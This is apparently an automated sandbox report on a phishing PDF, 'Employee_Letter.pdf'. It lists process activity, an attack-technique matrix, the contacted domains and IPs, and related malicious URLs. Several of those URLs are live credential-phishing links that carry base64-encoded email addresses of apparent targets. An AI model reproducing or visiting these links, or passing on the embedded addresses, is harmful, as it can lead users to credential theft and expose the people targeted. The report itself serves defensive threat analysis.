        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1920,i,690903513133958984,11826020221324224109,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Google Drive.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: YouTube.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Sheets.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Gmail.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Slides.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Docs.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: Employee_Letter.pdfInitial sample: PDF keyword /JS count = 0
        Source: Employee_Letter.pdfInitial sample: PDF keyword /JavaScript count = 0
        Source: A92k7288_ceyldq_558.tmp.0.drInitial sample: PDF keyword /JS count = 0
        Source: A92k7288_ceyldq_558.tmp.0.drInitial sample: PDF keyword /JavaScript count = 0
        Source: Employee_Letter.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
        Browser Extensions
        1
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        System Information Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Registry Run Keys / Startup Folder
        1
        Registry Run Keys / Startup Folder
        1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571793 Sample: Employee_Letter.pdf Startdate: 09/12/2024 Architecture: WINDOWS Score: 72 20 x1.i.lencr.org 2->20 34 Antivirus detection for URL or domain 2->34 36 AI detected phishing page 2->36 38 Yara detected HtmlPhish78 2->38 40 2 other signatures 2->40 8 chrome.exe 9 2->8         started        11 Acrobat.exe 20 62 2->11         started        signatures3 process4 dnsIp5 22 192.168.2.5, 443, 49537, 49627 unknown unknown 8->22 24 192.168.2.7 unknown unknown 8->24 26 239.255.255.250 unknown Reserved 8->26 13 chrome.exe 8->13         started        16 AcroCEF.exe 81 11->16         started        process6 dnsIp7 28 lotadmin.in 92.249.45.121, 443, 49723, 49728 AS-HOSTINGERLT Germany 13->28 30 larkus.ao 65.109.232.106, 443, 49732, 49738 ALABANZA-BALTUS United States 13->30 32 10 other IPs or domains 13->32 18 AcroCEF.exe 4 16->18         started        process8

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://lotadmin.in/due/cigam/index#cm9ubmllLnBhcnRyaWRnZUBjaGVyb2tlZWJyaWNrLmNvbQ==100%SlashNextCredential Stealing type: Phishing & Social Engineering
        https://lotadmin.in/favicon.ico0%Avira URL Cloudsafe
        https://lotadmin.in/due/cigam/style.css0%Avira URL Cloudsafe
        https://lotadmin.in/due/cigam/image/logo.png0%Avira URL Cloudsafe
        https://www.larkus.ao/animal/script.js0%Avira URL Cloudsafe
        https://lotadmin.in/due/cigam/index100%Avira URL Cloudphishing
        NameIPActiveMaliciousAntivirus DetectionReputation
        d26p066pn2w0s0.cloudfront.net
        13.227.8.72
        truefalse
          unknown
          ipapi.co
          104.26.9.44
          truefalse
            high
            larkus.ao
            65.109.232.106
            truetrue
              unknown
              lotadmin.in
              92.249.45.121
              truetrue
                unknown
                cdnjs.cloudflare.com
                104.17.25.14
                truefalse
                  high
                  www.google.com
                  142.250.181.68
                  truefalse
                    high
                    api.ipify.org
                    104.26.13.205
                    truefalse
                      high
                      go.eu.sparkpostmail1.com
                      52.30.207.151
                      truefalse
                        high
                        x1.i.lencr.org
                        unknown
                        unknownfalse
                          high
                          www.larkus.ao
                          unknown
                          unknowntrue
                            unknown
                            logo.clearbit.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://lotadmin.in/favicon.icofalse
                              • Avira URL Cloud: safe
                              unknown
                              https://go.eu.sparkpostmail1.com/f/a/TeZdKDVSihVahrYyiCrP-Q~~/AAGCxAA~/RgRpNb0OP0QjaHR0cHM6Ly9sb3RhZG1pbi5pbi9kdWUvY2lnYW0vaW5kZXhXBXNwY2V1QgpnRA44U2evTxxnUhJ6YXJnYXJAZmFyaWRlYS5jb21YBAAAAAE~false
                                high
                                https://lotadmin.in/due/cigam/index#cm9ubmllLnBhcnRyaWRnZUBjaGVyb2tlZWJyaWNrLmNvbQ==true
                                • SlashNext: Credential Stealing type: Phishing & Social Engineering
                                unknown
                                https://lotadmin.in/due/cigam/indextrue
                                • Avira URL Cloud: phishing
                                unknown
                                https://lotadmin.in/due/cigam/image/logo.pngfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://api.ipify.org/?format=jsonfalse
                                  high
                                  https://lotadmin.in/due/cigam/style.cssfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ipapi.co/json/false
                                    high
                                    https://logo.clearbit.com/cherokeebrick.com?size=400false
                                      high
                                      https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.cssfalse
                                        high
                                        https://www.larkus.ao/animal/script.jstrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2false
                                          high
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://fontawesome.comchromecache_190.6.drfalse
                                            high
                                            http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.2.drfalse
                                              high
                                              https://fontawesome.com/license/freechromecache_190.6.drfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.26.8.44
                                                unknownUnited States
                                                13335CLOUDFLARENETUSfalse
                                                65.109.232.106
                                                larkus.aoUnited States
                                                11022ALABANZA-BALTUStrue
                                                13.227.8.72
                                                d26p066pn2w0s0.cloudfront.netUnited States
                                                16509AMAZON-02USfalse
                                                142.250.181.68
                                                www.google.comUnited States
                                                15169GOOGLEUSfalse
                                                104.26.13.205
                                                api.ipify.orgUnited States
                                                13335CLOUDFLARENETUSfalse
                                                104.26.12.205
                                                unknownUnited States
                                                13335CLOUDFLARENETUSfalse
                                                52.30.207.151
                                                go.eu.sparkpostmail1.comUnited States
                                                16509AMAZON-02USfalse
                                                104.26.9.44
                                                ipapi.coUnited States
                                                13335CLOUDFLARENETUSfalse
                                                239.255.255.250
                                                unknownReserved
                                                unknownunknownfalse
                                                92.249.45.121
                                                lotadmin.inGermany
                                                47583AS-HOSTINGERLTtrue
                                                104.17.25.14
                                                cdnjs.cloudflare.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                IP
                                                192.168.2.7
                                                192.168.2.5
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1571793
                                                Start date and time:2024-12-09 17:46:03 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 5m 45s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:defaultwindowspdfcookbook.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:12
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:Employee_Letter.pdf
                                                Detection:MAL
                                                Classification:mal72.phis.winPDF@29/79@27/13
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .pdf
                                                • Found PDF document
                                                • Close Viewer
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 216.58.208.227, 173.194.222.84, 172.217.17.46, 23.218.208.137, 162.159.61.3, 172.64.41.3, 142.250.181.142, 23.192.153.142, 2.22.50.144, 2.22.50.151, 2.19.126.149, 2.19.126.143, 192.229.221.95, 172.217.17.35, 172.217.17.78, 23.218.208.109, 34.237.241.83, 23.195.76.153, 13.107.246.63, 20.109.210.53
                                                • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, acroipm2.adobe.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, clients1.google.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.com, geo2.adobe.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtCreateFile calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: Employee_Letter.pdf
                                                TimeTypeDescription
                                                11:47:04API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                SourceURL
                                                Screenshothttps://go.eu.sparkpostmail1.com/f/a/TeZdKDVSihVahrYyiCrP-Q~~/AAGCxAA~/RgRpNb0OP0QjaHR0cHM6Ly9sb3RhZG1pbi5pbi9kdWUvY2lnYW0vaW5kZXhXBXNwY2V1QgpnRA44U2evTxxnUhJ6YXJnYXJAZmFyaWRlYS5jb21YBAAAAAE~#cm9ubmllLnBhcnRyaWRnZUBjaGVyb2tlZWJyaWNrLmNvbQ==
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                104.26.8.44PQwHxAiBGt.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                  https://buiseenet-fbsp247.getresponsewebsite.com/Get hashmaliciousUnknownBrowse
                                                    https://application-submit.com/form/redbullGet hashmaliciousUnknownBrowse
                                                      https://3r9e6kkr.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.ca%2Furl%3Fq=30NUMBER%26rct=77772474802481024856%26sa=t%26url=amp%2Fs%2Festudioit.cl%2Fstarl%2F%2523Y2FybGEuYWxkZW1pcjFAbWxjaW5zdXJhbmNlLmNvbS5hdQ==/1/0100019346ba248e-096005ca-8ea9-493d-b2f5-e0c34fd69fc0-000000/JH6rhkavYmTGSs9Zspd-vAN7bi8=401Get hashmaliciousUnknownBrowse
                                                        http://wwwfucai13.ccGet hashmaliciousUnknownBrowse
                                                          https://app.scalenut.com/creator/991c897c-dcc2-43e6-ba55-339c0f6812c2/kj8jd9r9doGet hashmaliciousUnknownBrowse
                                                            https://www.google.ca/url?q=30NUMBER&rct=77151727248916238810&sa=t&url=amp/s/estudioit.cl/starl/%23YW5nZWxhLmhvZGdzb25AMnNmZy5jb20=Get hashmaliciousUnknownBrowse
                                                              bPRQRIfbbq.exeGet hashmaliciousUnknownBrowse
                                                                AD6dpKQm7n.exeGet hashmaliciousUnknownBrowse
                                                                  NfFibKKmiz.exeGet hashmaliciousUnknownBrowse
                                                                    13.227.8.72https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                                      https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3DGet hashmaliciousHTMLPhisherBrowse
                                                                        https://iemetodista.com.br/?data=c2VydmljZUBqcHBsdXMuY29tGet hashmaliciousUnknownBrowse
                                                                          Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                              https://management.sigmaonline.ro/newsletter_re_news.php?from_email=&abonat_id=&newsletter_id=773&followLink=http://ezp-prod1.hul.harvard.edu/login?url=https://accotoxtnation.es/mime/#Y25pY2hvbHNAZGVyaWNrZGVybWF0b2xvZ3kuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3DGet hashmaliciousUnknownBrowse
                                                                                  https://multikultural.az/web/v2/index.php?query=bWVubmVuQHNlbmlvcnNvbHV0aW9uc3Z0Lm9yZw==Get hashmaliciousUnknownBrowse
                                                                                    eInvoice.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                      https://multikultural.az/web/v2/index.php?query=ZW1ja2VubmFAY2hzaS5vcmc=Get hashmaliciousUnknownBrowse
                                                                                        104.26.13.205BiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                                                                                        • api.ipify.org/
                                                                                        lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                                                                                        • api.ipify.org/
                                                                                        Simple1.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                        • api.ipify.org/
                                                                                        Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        cdnjs.cloudflare.comhttps://zfrmz.com/wE0Jw9HNvGeKZ1fn5cBUGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        https://maya-lopez.filemail.com/t/BLFGBJSQGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.24.14
                                                                                        https://www.google.com.hk/url?q=KWUZMS42J831JSWOSF4KEIP36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fjvsimmigration.com/c/f47d85f33978f9cdbc582e1dfc382cef/Y2hhZGhAc3dzZXF1aXBtZW50LmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                        • 104.17.24.14
                                                                                        securedoc_20241209T071703.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.24.14
                                                                                        _.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.25.14
                                                                                        https://jdjdhjh.uscourtdocuments.com/A3RjQGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.24.14
                                                                                        http://www.sbh.co.uk/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                        • 104.17.24.14
                                                                                        http://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.comGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        http://74.50.69.234/Get hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        ipapi.coPQwHxAiBGt.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                        • 104.26.8.44
                                                                                        https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.26.9.44
                                                                                        https://buiseenet-fbsp247.getresponsewebsite.com/Get hashmaliciousUnknownBrowse
                                                                                        • 104.26.8.44
                                                                                        Employee_Bonus_Notlce.pdfGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.69.226
                                                                                        https://application-workspace.com/red-bull/id-38772Get hashmaliciousUnknownBrowse
                                                                                        • 104.26.9.44
                                                                                        https://application-submit.com/form/redbullGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.8.44
                                                                                        https://application-submit.com/form/redbullGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.9.44
                                                                                        https://avidgroup.famislnc.com/fvcvfxfec/cc6d843dfd/?1f9da=amtsZW1wQGNhcmlzbHMuY29tGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.69.226
                                                                                        https://www.google.co.ls/amp/s/2mzptv.s3.us-east-1.amazonaws.com/qr.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.69.226
                                                                                        https://3r9e6kkr.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.ca%2Furl%3Fq=30NUMBER%26rct=77772474802481024856%26sa=t%26url=amp%2Fs%2Festudioit.cl%2Fstarl%2F%2523Y2FybGEuYWxkZW1pcjFAbWxjaW5zdXJhbmNlLmNvbS5hdQ==/1/0100019346ba248e-096005ca-8ea9-493d-b2f5-e0c34fd69fc0-000000/JH6rhkavYmTGSs9Zspd-vAN7bi8=401Get hashmaliciousUnknownBrowse
                                                                                        • 104.26.8.44
                                                                                        d26p066pn2w0s0.cloudfront.nethttps://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.227.8.47
                                                                                        https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.227.8.72
                                                                                        https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.227.8.72
